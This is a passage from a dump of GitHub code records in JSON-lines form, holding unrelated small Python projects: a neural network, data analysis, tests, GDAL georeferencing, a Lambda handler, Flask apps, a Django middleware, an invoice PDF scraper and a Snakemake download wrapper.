np.zeros((self.hNodes, 1))\n\n self.oBias = np.zeros((self.oNodes, 1))\n self.oBiasDelta = np.zeros((self.oNodes, 1))\n else:\n self.bias = 1\n self.hBias = rand.normal(0.0, 0.5, (self.hNodes, 1))\n self.hBiasDelta = np.zeros((self.hNodes, 1))\n\n self.oBias = rand.normal(0.0, 0.5, (self.oNodes, 1))\n self.oBiasDelta = np.zeros((self.oNodes, 1))\n\n self.hActFun = lambda z: ss.expit(z)\n\n # activation function for output layer\n if outputActivationFun is False:\n self.oActFun = lambda z: ss.expit(z)\n self.oErrFun = lambda x, y: ((x - y) * x * (1 - x))\n else:\n self.oActFun = lambda z: z\n self.oErrFun = lambda x, y: ((x - y))\n\n def train(self, arrU, arrV):\n arrU = np.array(arrU, ndmin=2)\n\n # arrX - hidden layer output\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n arrX = self.hActFun(hidZ)\n\n # Y - output layer output\n outZ = np.inner(arrX, self.oWeights) + self.oBias.T\n Y = self.oActFun(outZ)\n\n # oErr - backward propagation of errors for output layer\n arrV = np.array(arrV)\n oErr = self.oErrFun(Y, arrV)\n\n # hErr - backward propagation of errors for hidden layer\n sigma = np.inner(oErr, self.oWeights.T)\n hErr = ((sigma * arrX * (1 - arrX)))\n\n self.oWeights -= self.alpha * oErr.T * arrX + self.oWeightsDelta\n self.hWeights -= self.alpha * hErr.T * arrU + self.hWeightsDelta\n\n self.oWeightsDelta = self.beta * (self.alpha * oErr.T * arrX + self.oWeightsDelta)\n self.hWeightsDelta = self.beta * (self.alpha * hErr.T * arrU + self.hWeightsDelta)\n\n if self.bias != 0:\n self.oBias -= self.alpha * oErr.T + self.oBiasDelta\n self.hBias -= self.alpha * hErr.T + self.hBiasDelta\n\n self.oBiasDelta = self.beta * (self.alpha * oErr.T + self.oBiasDelta)\n self.hBiasDelta = self.beta * (self.alpha * hErr.T + self.hBiasDelta)\n\n def query(self, arrU):\n arrU = np.array(arrU, ndmin=2)\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n arrX = self.hActFun(hidZ)\n outZ = np.inner(arrX, self.oWeights) + self.oBias.T\n return (self.oActFun(outZ)[0])\n\n def hiddenQuery(self, arrU):\n arrU = np.array(arrU, ndmin=2)\n hidZ = np.inner(arrU, self.hWeights) + self.hBias.T\n return np.squeeze(self.hActFun(hidZ))\n","repo_name":"Podlewski/IAD","sub_path":"Zadanie 1/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"32651583506","text":"from pymongo import MongoClient\nimport 
pymongo\nimport json\nimport csv\nfrom mongo_db_connect import db\nfrom scipy.stats.stats import pearsonr\n\nitems = db.topics.find({})\n\nppsA = []\nppiA = []\nppA = []\n\nppsI = []\nppiI = []\n\nppsH = []\nppiH = []\n\nc = set()\n\nfor item in items:\n\ttId = item['_id']\n\ttopicName = item['topicName']\n\ttopicDescription = item['topicDescription']\n\tsemester = item['semester']\n\tclassification = item['classification']\n\ttotalPosts = item['TotalPosts']\n\tnumStudents = item['NumUniqueStudents']\n\tnumInstructors = item['NumUniqueInstructors']\n\tnumTas = item['NumUniqueTas']\n\tnumStudentPosts = item['NumStudentPosts']\n\tnumInstructorPosts = item['NumInstructorPosts']\n\tnumTaPosts = item['NumTaPosts']\n\tpostsPerStudent = item['postsPerStudent']\n\tpostsPerInstructor = item['postsPerInstructor']\n\n\tc.add(classification)\n\n\tif classification == 'Academic':\n\t\tppsA.append(postsPerStudent)\n\t\tppiA.append(postsPerInstructor)\n\t\tppA.append([tId, postsPerInstructor, postsPerStudent, numInstructors, numStudents])\n\n\tif classification == 'Introductions':\n\t\tppsI.append(postsPerStudent)\n\t\tppiI.append(postsPerInstructor)\n\n\tif classification == 'Help':\n\t\tppsH.append(postsPerStudent)\n\t\tppiH.append(postsPerInstructor)\n\ncorrelA = pearsonr(ppsA, ppiA)\ncorrelI = pearsonr(ppsI, ppiI)\ncorrelH = pearsonr(ppsH, ppiH)\n\nfor p in ppA:\n\tprint(str(p[0]) + \", \" + str(p[1]) + \", \" + str(p[2]) + \", \" + str(p[3]) + \", \" + str(p[4]))","repo_name":"jcastle0/LLED7910E-Asynchronous-Online-Discourse-Project","sub_path":"Data Analysis Scripts/discussions_topics_posts_per.py","file_name":"discussions_topics_posts_per.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25691630926","text":"from unittest.mock import mock_open, patch\n\nfrom pytest import fixture\n\nfrom music_insights.library.album import Album\nfrom music_insights.library.artist import Artist\nfrom music_insights.library.library import Library\nfrom music_insights.library.song import Song\n\n\n@fixture\ndef example_song1() -> Song:\n return Song(\n song_id=\"song_id1\",\n added_at=\"2023-01-26T23:47:21Z\",\n artists=[\"artist_id_1\", \"artist_id_2\"],\n duration_ms=185000,\n explicit=True,\n name=\"track_name\",\n popularity=40,\n track_number=2,\n album_id=\"album_id1\",\n disc_number=4,\n is_local=False\n )\n\n\n@fixture\ndef example_song2() -> Song:\n return Song(\n song_id=\"song_id2\",\n added_at=\"2023-01-26T23:47:21Z\",\n artists=[\"artist_id_1\", \"artist_id_2\"],\n duration_ms=185000,\n explicit=True,\n name=\"track_name\",\n popularity=40,\n track_number=2,\n album_id=\"album_id2\",\n disc_number=4,\n is_local=False\n )\n\n\n@fixture\ndef example_album1() -> Album:\n return Album(\n artists=[\"artist_id\"],\n album_id=\"album_id1\",\n name=\"album_name\",\n release_date=\"2030-01-01\",\n release_date_precision=\"day\",\n songs=[\"song_id1\"],\n total_tracks=2,\n genres=[\"genre1\", \"genre2\"],\n label=\"label1\",\n popularity=10\n )\n\n\n@fixture\ndef example_album2() -> Album:\n return Album(\n artists=[\"artist_id\"],\n album_id=\"album_id2\",\n name=\"album_name\",\n release_date=\"2050-01-01\",\n release_date_precision=\"day\",\n songs=[\"song_id2\"],\n total_tracks=2,\n genres=[\"genre1\", \"genre2\"],\n label=\"label1\",\n popularity=10\n )\n\n\n@fixture\ndef example_artist() -> Artist:\n return Artist(\n name=\"artist_name\",\n artist_id=\"artist_id\",\n followers=11,\n genres=[\"genre1\", 
\"genre2\"],\n popularity=21\n )\n\n\n@fixture\ndef example_library(\n example_song1: Song,\n example_song2: Song,\n example_album1: Album,\n example_album2: Album,\n example_artist: Artist\n) -> Library:\n return Library(\n {\n example_song1.song_id: example_song1,\n example_song2.song_id: example_song2\n },\n {\n example_album1.album_id: example_album1,\n example_album2.album_id: example_album2\n },\n {\n example_artist.artist_id: example_artist\n }\n )\n\n\nclass TestLibrary:\n def test_serialization(self, example_library: Library):\n mock = mock_open()\n with patch(\"music_insights.library.library.open\", mock, create=True):\n example_library.save_to_file()\n assert mock.call_count == 3\n\n def test_songs_by_decades(self, example_library: Library):\n songs_by_decades = example_library.get_songs_by_decades()\n assert songs_by_decades == {2030: [\"song_id1\"], 2050: [\"song_id2\"]}\n","repo_name":"JuanTecedor/MusicInsights","sub_path":"music_insights/test/library/test_library.py","file_name":"test_library.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23452964345","text":"def cout():\r\n i = 5\r\n while i > 0:\r\n yield i \r\n i -= 1\r\n\r\nfor i in cout():\r\n print(i)\r\n\r\n\r\n\r\ndef make_word():\r\n word = \"\"\r\n for ch in \"spam\":\r\n word +=ch\r\n yield word\r\n\r\nprint(list(make_word()))","repo_name":"cybity/Python","sub_path":"Intermediate/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"37814255718","text":"from pathlib import Path\nfrom osgeo import gdal, osr\n\n# Adapted from https://svn.osgeo.org/gdal/trunk/autotest/alg/warp.py\ndef warp_with_gcps(input_path, output_path, gcps, gcp_epsg=4326, output_epsg=4326):\n # Open the source dataset and add GCPs to it\n src_ds = input_path#gdal.OpenShared(str(input_path), gdal.GA_Update)\n gcp_srs = osr.SpatialReference()\n gcp_srs.ImportFromEPSG(gcp_epsg)\n gcp_crs_wkt = gcp_srs.ExportToWkt()\n src_ds.SetGCPs(gcps, gcp_crs_wkt)\n\n # Define target SRS\n dst_srs = osr.SpatialReference()\n dst_srs.ImportFromEPSG(output_epsg)\n dst_wkt = dst_srs.ExportToWkt()\n\n error_threshold = 0.125 # error threshold --> use same value as in gdalwarp\n resampling = gdal.GRA_Bilinear\n\n # Call AutoCreateWarpedVRT() to fetch default values for target raster dimensions and geotransform\n tmp_ds = gdal.AutoCreateWarpedVRT(src_ds,\n None, # src_wkt : left to default value --> will use the one from source\n dst_wkt,\n resampling,\n error_threshold,\n )\n dst_xsize = tmp_ds.RasterXSize\n dst_ysize = tmp_ds.RasterYSize\n dst_gt = tmp_ds.GetGeoTransform()\n tmp_ds = None\n\n # Now create the true target dataset\n dst_path = str(Path(output_path).with_suffix(\".tif\"))\n dst_ds = gdal.GetDriverByName('GTiff').Create(dst_path, dst_xsize, dst_ysize, src_ds.RasterCount)\n dst_ds.SetProjection(dst_wkt)\n dst_ds.SetGeoTransform(dst_gt)\n dst_ds.GetRasterBand(1).SetNoDataValue(0)\n\n # And run the reprojection\n gdal.ReprojectImage(src_ds,\n dst_ds,\n None, # src_wkt : left to default value --> will use the one from source\n None, # dst_wkt : left to default value --> will use the one from destination\n resampling,\n 0, # WarpMemoryLimit : left to default value\n error_threshold,\n None, # Progress callback : could be left to None or unspecified for silent progress\n None) # Progress callback user data\n dst_ds 
= None\n# input_path = Path(\"x.tif\")\n# output_path = Path(\"y.tif\")\n# # GCP input\n# xyz = [...]\n# row_col = [...]\n#\n# gcps = []\n# for (x, y, z), (row, col) in zip(xyz, row_col):\n# gcps.append(gdal.GCP(x, y, z, col, row))\n#\n# warp_with_gcps(input_path, output_path, gcps, gcp_epsg=3301, output_epsg=3301)\n","repo_name":"googleol/satelliteprocessing","sub_path":"Geometry/gdal_warp_georef.py","file_name":"gdal_warp_georef.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"8994746957","text":"from django.contrib.auth import authenticate, login\n\n\nclass TokenAuthMiddleware(object):\n \"\"\" Authentication Middleware for authenticating a user via token \"\"\"\n\n def process_request(self, request):\n \"\"\"\n Authenticate a user via token\n :param request: The HTTP request to pre-process\n :return:\n \"\"\"\n t = request.GET.get('token')\n if not t:\n return\n\n user = authenticate(token=t)\n if user:\n request.user = user\n # login(request, user)","repo_name":"mei-chen/beagle","sub_path":"Dogbone/authentication/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"41894116769","text":"def lambda_handler(event, context):\n \"\"\"\n Basic Lambda Handler\n Returns the message from the query string parameters\n\n \"\"\"\n print(event)\n try:\n name = str(event['queryStringParameters']['name'])\n amount = float(event['queryStringParameters']['amount'])\n percentage = float(event['queryStringParameters']['percentage'])\n answer = (amount * percentage) / 100\n return {\n 'statusCode':\n 200,\n 'body':\n \"Hello, \" + (name) + \" \" + str(percentage) + \" percent of \" +\n str(amount) + \" is \" + str(answer)\n }\n\n except KeyError:\n message = 'No message found'\n return {'statusCode': 200, 'body': message}","repo_name":"NDY-Hyde/Hyde-Terraform-Workshop","sub_path":"zara-lambda.py","file_name":"zara-lambda.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37871076590","text":"from flask import Flask\nfrom requests import Request, Session\nimport json\nimport urllib\nimport time\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n@app.route('/gofind-instagram-api/')\ndef instagram_api(access_token):\n s = Session()\n req = Request('GET', \"https://api.instagram.com/v1/users/self/?access_token=%s\"%access_token)\n prepped = req.prepare()\n resp = s.send(prepped)\n username = json.loads(resp.content)['data']['username']\n \n s = Session()\n req = Request('GET', \"https://api.instagram.com/v1/users/self/media/recent/?COUNT=250&access_token=%s\"%access_token)\n prepped = req.prepare()\n resp = s.send(prepped)\n\n data = json.loads(resp.content)\n img_list = \"input/\"+access_token+\".txt\"\n with open(img_list, 'w') as f:\n for i in xrange(len(data['data'])):\n url = data['data'][i]['images']['standard_resolution']['url']\n file_path = \"input/\"+access_token+\"_\"+str(i)+'.jpg'\n urllib.urlretrieve(url,file_path)\n f.write(file_path+'\\n')\n\n \n import yolo \n return_value = yolo.main(img_list, username)\n if return_value:\n return return_value\n else:\n return \"Fail\"\n\nif __name__ == '__main__':\n 
app.run()\n\n","repo_name":"GeneDer/gofind.ai-instagram-image-search","sub_path":"flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"15992964882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nfrom flask import Flask, request, session, g, redirect, url_for, \\\n abort, render_template, flash, jsonify, send_from_directory\nfrom contextlib import closing\nfrom datetime import datetime, timedelta\nimport sqlite3\nimport os\nfrom werkzeug.utils import secure_filename\nimport json\n\n# Custom\nfrom parse_json import parse_json\n\n# Create application instance\napp = Flask(__name__)\n\n# Load configuration\napp.config.from_pyfile('config.py')\n\n# Define\n\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in app.config[\n 'ALLOWED_EXTENSIONS']\n\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n\n@app.after_request\ndef after_request(response):\n g.db.close()\n return response\n\n# Placeholder: View function\n@app.route('/', methods=['GET', 'POST'])\ndef inputfile():\n cur = g.db.execute(\n 'select filename,desc,created,id from file_entries order by created desc')\n entries = [dict(filename=row[0], desc=row[1], created=row[\n 2], id=row[3]) for row in cur.fetchall()]\n\n if request.method == 'POST':\n # check if the post request has the file part\n if 'file' not in request.files:\n flash('No file part')\n return redirect(url_for('inputfile'))\n file = request.files['file']\n # if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n flash('No selected file')\n return redirect(url_for('inputfile'))\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n current = datetime.now()\n g.db.execute('insert into file_entries (filename,desc,created) values (?, ?, ?)',\n [file.filename, request.form['desc'], current])\n g.db.commit()\n message = \"File upload finished successfully.\"\n return redirect(url_for('inputfile', message=message))\n\n current = datetime.now().strftime('%Y/%m/%d %H:%M')\n message = request.args.get('message', '')\n if not message:\n message = \"Current time is \" + current\n return render_template('inputfile.html', message=message, entries=entries)\n\n\n@app.route('/output')\ndef output():\n fname = request.args.get('value').replace(' ','_')\n fpath = app.config['UPLOAD_FOLDER'] + fname\n jsonfile = open(fpath,'r')\n config = json.load(jsonfile)\n output = parse_json(config)\n\n return render_template('output.html', entries=output)\n\n\n@app.route('/delete', methods=['GET', 'POST'])\ndef delete():\n id = request.args.get('value')\n g.db.execute(\"delete from file_entries where id = ?\", [id])\n g.db.commit()\n return redirect(url_for('inputfile'))\n\n\n# Start application\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","repo_name":"KI1208/jsonparser","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32444041861","text":"import math\n\n\ndef 
solution(cap, n, deliveries, pickups):\n cap_deliveries = [0] * n # how many visits are needed to deliver to the n houses?\n cap_pickups = [0] * n # how many visits are needed to pick up from the n houses?\n for i in range(len(deliveries) - 1, -1, -1): # cumulative sum from the back\n if i == len(deliveries) - 1:\n deliveries[i] = deliveries[i]\n else:\n deliveries[i] = deliveries[i] + deliveries[i + 1]\n cap_deliveries[i] = math.ceil(deliveries[i] / cap) # array of delivery visit counts for the n houses, taking cap into account\n\n for i in range(len(pickups) - 1, -1, -1):\n if i == len(pickups) - 1:\n pickups[i] = pickups[i]\n else:\n pickups[i] = pickups[i] + pickups[i + 1]\n cap_pickups[i] = math.ceil(pickups[i] / cap) # array of pickup visit counts for the n houses, taking cap into account\n\n temp = 0\n answer_deliveries = [] # how far does each delivery trip have to go?\n answer_pickups = [] # how far does each pickup trip have to go?\n for i in range(n):\n if cap_deliveries[n - 1 - i] > temp: # if greater than temp, i.e., the number of delivery visits changes\n for _ in range(cap_deliveries[n - 1 - i] - temp): # once per required visit\n answer_deliveries.append((n - i)) # append the visit distance\n temp = cap_deliveries[n - 1 - i] # then update temp\n temp = 0\n for i in range(n):\n if cap_pickups[n - 1 - i] > temp: # if greater than temp, i.e., the number of pickup visits changes\n for _ in range(cap_pickups[n - 1 - i] - temp):\n answer_pickups.append((n - i))\n temp = cap_pickups[n - 1 - i]\n\n answer = 0\n # if there are far more pickups or deliveries, the two trip counts differ, so pad the shorter one with zeros\n if len(answer_deliveries) > len(answer_pickups):\n answer_pickups.extend([0] * (len(answer_deliveries) - len(answer_pickups)))\n elif len(answer_deliveries) < len(answer_pickups):\n answer_deliveries.extend([0] * (len(answer_pickups) - len(answer_deliveries)))\n # on each trip, going to the farther of the delivery/pickup targets naturally completes the rest\n for i in range(len(answer_deliveries)):\n answer += 2 * max(answer_deliveries[i], answer_pickups[i])\n\n return answer\n\n\n# Taking the cumulative sum from the back...\n# \"\"\"\n# 7 6 6 3 2 -> cap is 4, so 7/4 = 1.x means 2 trips are needed... dividing everything by 4: 1.x 1.x 1.x 0.x 0.x -> ceil 2 2 2 1 1\n# 7 7 4 4 0 -> with cap 4 this one also needs 2 trips... 1.x 1.x 1 1 0 -> ceil 2 2 1 1 0\n\n# For now no pickup count is larger than the delivery count, so everything is handled on the way back\n# 2 2 2 1 1 -> trip 1 up to distance 5 / trip 2 up to distance 3\n# 2 2 1 1 0 -> trip 1 up to distance 5 (follows the one above) / trip 2 up to distance 3 ... total 16, done\n\n# 5 3\n# 4 2\n\n# 6 5 5 3 3 2 2 ->\n# 5 5 3 3 2 2 0 ->\n\n# divide by 2 + ceil\n# here too no pickup count is larger than the delivery count\n# 3 3 3 2 2 1 1 -> trip 1 up to 7 / trip 2 up to 5 / trip 3 up to 3\n# 3 3 2 2 1 1 0 -> trip 1 up to 7 / trip 2 up to 5 / trip 3 up to 3 ... 14 + 10 + 6 = 30\n\n# 7 5 3\n# 6 4 2\n\n# What if a pickup count is larger than the delivery count? 
(i.e., one house has a huge number of pickups)\n# 1 0 3 1 2 -> 7 6 6 3 2 -> 2 2 2 1 1\n# 0 3 0 20 0 -> 23 23 20 20 0 -> 6 6 5 5 0\n\n# 5 3\n# 4 4 4 4 4 2\n\n# \"\"\"\n","repo_name":"boostcampDinosaur/coding-test-study","sub_path":"Wonjun/Week1/P_150369_택배_배달과_수거하기.py","file_name":"P_150369_택배_배달과_수거하기.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26165431217","text":"import slate3k as slate\nimport pandas as pd\nimport os\nfrom dateutil.parser import parse as dateparser\n\ndef get_money(line):\n \"\"\"\n returns the sum of all dollar values (printed in the format \"\"$x.xx\")\n in the given string\n \"\"\"\n sum = 0.0\n start = line.find('Time:')\n line = line[start:]\n dollar = line.find('$')\n while dollar != -1:\n line = line[dollar+1:]\n period_i = line.find('.')\n if len(line) > period_i + 3 and (line[period_i+3] == ',' or line[period_i+3] == '.'):\n sum += float(line[:period_i+3])\n dollar = line.find('$')\n\n return sum\n\n\ndef find_next_entry(invoice_text, month):\n \"\"\"\n find the next entry in the text based on previously seen text patterns\n \"\"\"\n i = invoice_text.find('On ' + month)\n return i\n\n\ninvoice_dir = \"invoices\"\nfiles = filter(lambda x : x[-4:]=='.pdf', os.listdir(invoice_dir))\ndf = pd.DataFrame(columns=['Date', 'Rental Company', 'Amount'])\ndfi = 0 # index to add to in df\n\nfor f in files:\n fname = os.path.join(invoice_dir, f)\n\n with open(fname,'rb') as invoice: # open invoice\n invoice_pdf = slate.PDF(invoice)\n invoice_text = str(invoice_pdf)\n invoice_text = invoice_text.replace('\\\\n', '\\n ') # clean up newlines\n invoice_text = invoice_text.replace('\\n \\n ', '\\n ')\n\n search_text = invoice_text\n\n \"\"\"\n fr = open('test.txt', 'w') # tracking what the program is seeing\n fr.write(invoice_text)\n fr.close()\n \"\"\"\n\n booking_index = invoice_text.find('bookings this month.')\n num_bookings = int(invoice_text[booking_index-4:booking_index].split(' ')[-2])\n\n data_start = invoice_text.find('usage details') # month of invoice is listed here\n month_str = invoice_text[:data_start].split(' ')[-3:-1]\n month = month_str[0]\n year = month_str[1]\n invoice_text = invoice_text[data_start:] # no ride data before this\n\n i = find_next_entry(invoice_text, month) # find the standard form of a Modo statement\n\n while i != -1:\n invoice_text = invoice_text[i:]\n month_pos = invoice_text.find(month)\n year_pos = invoice_text.find(year)\n time_pos = invoice_text[year_pos+4].find(':')\n date = dateparser(invoice_text[month_pos:year_pos+4] + ' ' +\n invoice_text[time_pos -2 : time_pos +3])\n date = date.date()\n\n split = invoice_text.find('PST') + 12\n if 'PVRT' in invoice_text[split: split + 65]:\n split = invoice_text[split: split + 65].find('PVRT') + 18\n readline = invoice_text[:split] # collect only the line that this statement is for\n invoice_text = invoice_text[split-3:] # remove the statement we've already found\n\n cost = get_money(readline)\n cost = \"%.2f\" % round(cost, 2)\n\n if \"$\" + cost not in search_text:\n print(cost + \" seems to be wrong in \" + f + \" on \" + str(date))\n if float(cost)<1.0:\n print(cost + \" seems to be wrong in \" + f + \" on \" + str(date))\n\n late_return_str = \"Charge for late return\"\n late_return_i = search_text.find(late_return_str)\n while late_return_i != -1:\n end_late_line = search_text[late_return_i:].find('\\n')\n print(\"Late return: \" + search_text[late_return_i: late_return_i + end_late_line] + \" in \" + f)\n 
search_text = search_text[late_return_i + len(late_return_str):]\n late_return_i = search_text.find(late_return_str)\n df.loc[dfi] = [date, 'Modo', cost]\n dfi += 1 # write to next row\n\n i = find_next_entry(invoice_text, month) # find the standard form of a Modo statement\n num_bookings -= 1\n\n if num_bookings != 0:\n print(str(num_bookings) + \" bookings off by in \" + f)\n\ndf.to_csv('modo_usage.csv', index=False)\n","repo_name":"JacksonDagger/modo-invoice-scraper","sub_path":"invoice2csv.py","file_name":"invoice2csv.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"834893061","text":"'''\nThis script is half-done, future features to add: \n1. Each parameter will be drawn using a function so that the structure is cleaner and \n the function can be more flexible \n2. All parameters should be saved in a .csv file\n3. Hard-coded titles (e.g., h2, a, span, etc.) should be drawn from an external record\n and try to use strings (i.e., \"h2\" instead of h2)\n4. Maybe make a checklist that records different scraping strategies for different \n websites \n'''\n\n# Get all the packages\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport time\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\n\n# Set the options so that this program will wait for the whole page to be loaded \n# However, this may mean only part of the Javascript have been executed \noptions = Options()\noptions.page_load_strategy = 'normal'\n\n# Open a browser \ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\n\n# Set initial page index and index increment (because the current program cannot \n# scrape the whole page fully loaded) so that all pages will be scraped and only\n# a certain amount of elements will be scraped each time \nbox_index = 0\nindex_increment = 2\n\n# Set home URL in case there are detail pages that need to be jumped to\n# Set the original URL that will be the beginning of scraping work \nURL_home = \"https://www.heritagetoyotaowingsmills.com\"\nURL_original = \"https://www.heritagetoyotaowingsmills.com/used-inventory/index.htm?start=\"\n\n# Go through each page and scrape elements \nwhile True: \n\n ## Go to a certain page/box and get the raw html document \n URL_specific = URL_original + str(box_index)\n driver.get(URL_specific)\n html_text = driver.page_source\n\n ## Process the raw file with BeautifulSoup() so as to make it easier to scrape\n soup = BeautifulSoup(html_text, \"lxml\")\n \n ## Get all the car-box on one page but only keep the first few that have the \n ## full information \n car_list = soup.find_all('div', class_ = 'vehicle-card-details-container')\n car_list = car_list[0:min(len(car_list), index_increment)]\n\n ## Go through each box/car on the list \n for car in car_list:\n\n ### Get the mileage information that's on a separate page \n try:\n detail_link = soup.find_all('a', class_ = 'more-details-link ml-auto text-link text-link-muted btn-small')[car_list.index(car)]['href']\n detail_link = URL_home + detail_link\n driver.get(detail_link)\n tmp_html_text = driver.page_source\n tmp_soup = BeautifulSoup(tmp_html_text, \"lxml\")\n\n #### different elements share the same feature as the mileage info, it's \n #### better to go through each of them and filter out the mileage one \n all_mileage = 
tmp_soup.find_all('span', class_ = 'mr-3')\n for i in range(0, len(all_mileage)):\n try: \n if i == len(all_mileage):\n mileage = \"N/A\"\n elif 'mile' in all_mileage[i].text:\n mileage = all_mileage[i].text\n break\n except: \n next\n driver.back()\n except:\n detail_link = \"N/A\"\n mileage = \"N/A\"\n\n ### Get the car name\n try:\n car_name = car.h2.a.text\n except: \n car_name = \"N/A\"\n\n ### Get the retail price and discount if available \n try:\n retail_price = car.find('dd', class_ = 'retailValue').span.text\n discount = car.find('dd', class_ = 'discount text-success').span.text\n except: \n retail_price = \"N/A\"\n discount = \"N/A\"\n\n ### Get the current final price \n try:\n final_price = car.find('span', class_ = 'text-right portal-price').text\n except:\n final_price = \"N/A\"\n\n ### For now, just print out the scraped info \n print(car_name)\n print(retail_price)\n print(discount)\n print(final_price)\n print(detail_link)\n print(mileage)\n \n ## If there's no more car elements, don't need to go into the next page \n if len(car_list) < index_increment:\n break\n else:\n box_index += index_increment\n\n# Close the browser \ndriver.quit()\n","repo_name":"KaiyueZou/Car-Dealer-Web-Scrape","sub_path":"main-script.py","file_name":"main-script.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17758543696","text":"# Runtime 121 ms Beats 10.96%\n# Memory 14.6 MB Beats 98.85%\n\nclass Solution:\n def searchInsert(self, nums: List[int], target: int) -> int:\n a = - 1\n for i in nums:\n if i < target:\n a += 1\n else:\n return a + 1\n return a + 1\n","repo_name":"MinyanLi/leetcode","sub_path":"0035_Search Insert Position/solution_1.py","file_name":"solution_1.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9358833082","text":"with open(\"27-9b.txt\", \"r\") as f:\n a = f.read().strip().split(\"\\n\")\n\nn = int(a[0])\ndata = [int(i) for i in a[1:]]\nansw = float(\"inf\")\n\nnch = [(data[i], i) for i in range(n) if data[i] % 2 != 0]\nnch.sort()\n\nprint(nch)\n","repo_name":"trofik00777/EgeInformatics","sub_path":"probn/20.06_1/27_1.py","file_name":"27_1.py","file_ext":"py","file_size_in_byte":220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"34391739220","text":"__author__ = \"Johannes Köster\"\n__copyright__ = \"Copyright 2019, Johannes Köster\"\n__email__ = \"johannes.koester@uni-due.de\"\n__license__ = \"MIT\"\n\nimport subprocess\nimport sys\nfrom snakemake.shell import shell\n\nspecies = snakemake.params.species.lower()\nrelease = int(snakemake.params.release)\nfmt = snakemake.params.fmt\nbuild = snakemake.params.build\nflavor = snakemake.params.get(\"flavor\", \"\")\n\nbranch = \"\"\nif release >= 81 and build == \"GRCh37\":\n # use the special grch37 branch for new releases\n branch = \"grch37/\"\n\nif flavor:\n flavor += \".\"\n\nlog = snakemake.log_fmt_shell(stdout=False, stderr=True)\n\nsuffix = \"\"\nif fmt == \"gtf\":\n suffix = \"gtf.gz\"\nelif fmt == \"gff3\":\n suffix = \"gff3.gz\"\n\nurl = \"ftp://ftp.ensembl.org/pub/{branch}release-{release}/{fmt}/{species}/{species_cap}.{build}.{release}.{flavor}{suffix}\".format(\n release=release,\n build=build,\n species=species,\n fmt=fmt,\n species_cap=species.capitalize(),\n suffix=suffix,\n flavor=flavor,\n branch=branch,\n)\n\ntry:\n shell(\"(curl -L 
{url} | gzip -d > {snakemake.output[0]}) {log}\")\nexcept subprocess.CalledProcessError as e:\n if snakemake.log:\n sys.stderr = open(snakemake.log[0], \"a\")\n print(\n \"Unable to download annotation data from Ensembl. \"\n \"Did you check that this combination of species, build, and release is actually provided?\",\n file=sys.stderr,\n )\n exit(1)\n","repo_name":"casperch/snakemake-wrappers","sub_path":"bio/reference/ensembl-annotation/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1834106918","text":"import flask\nfrom flask import request\nfrom flask import send_file\nfrom flask import after_this_request\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium import webdriver\nimport json\nimport base64\nimport os\n\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = False\n\ndef set_chrome_options() -> None:\n \"\"\"Sets chrome options for Selenium.\n Chrome options for headless browser is enabled.\n \"\"\"\n chrome_options = Options()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--disable-dev-shm-usage\")\n chrome_prefs = 